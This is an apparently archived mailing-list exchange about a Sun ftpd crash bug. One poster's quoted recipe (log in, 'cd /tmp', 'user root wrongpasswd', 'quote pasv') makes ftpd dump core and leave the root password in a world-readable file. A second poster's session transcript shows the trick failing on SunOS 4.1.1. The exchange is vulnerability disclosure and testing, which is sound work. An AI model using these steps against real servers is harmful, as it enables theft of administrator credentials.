Re: ftpd bug? Was: bin/1805: Bug in ftpd

[gamble () dxcoms cern ch (gamble () dxcoms cern ch)]

Doesn't work for me ... SunOS 4.1.1

SOMEWHERE>ftp sunos
220 sunos FTP server (SunOS 4.1) ready.
Connected to sunos.xxx.xx.
Name (sunos:smith):
331 Password required for smith.
Password:
230 User smith logged in.
FTP> cd /tmp
250 CWD command successful.
FTP> user root fred
530 User root access denied.
%FTP-E-LOGREJ, Login request rejected
FTP> quote pasv
421 Service not available, Remote server has closed the connection
SOMEWHERE>

and no core in /tmp

John
------------------------------------------ original message


James Poland 6-5251 wrote:
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
    so the seem to have used the proposed fix

         Checking for "pw != NULL"

    So this proposal was simple and obvious   ... and incomplete. :)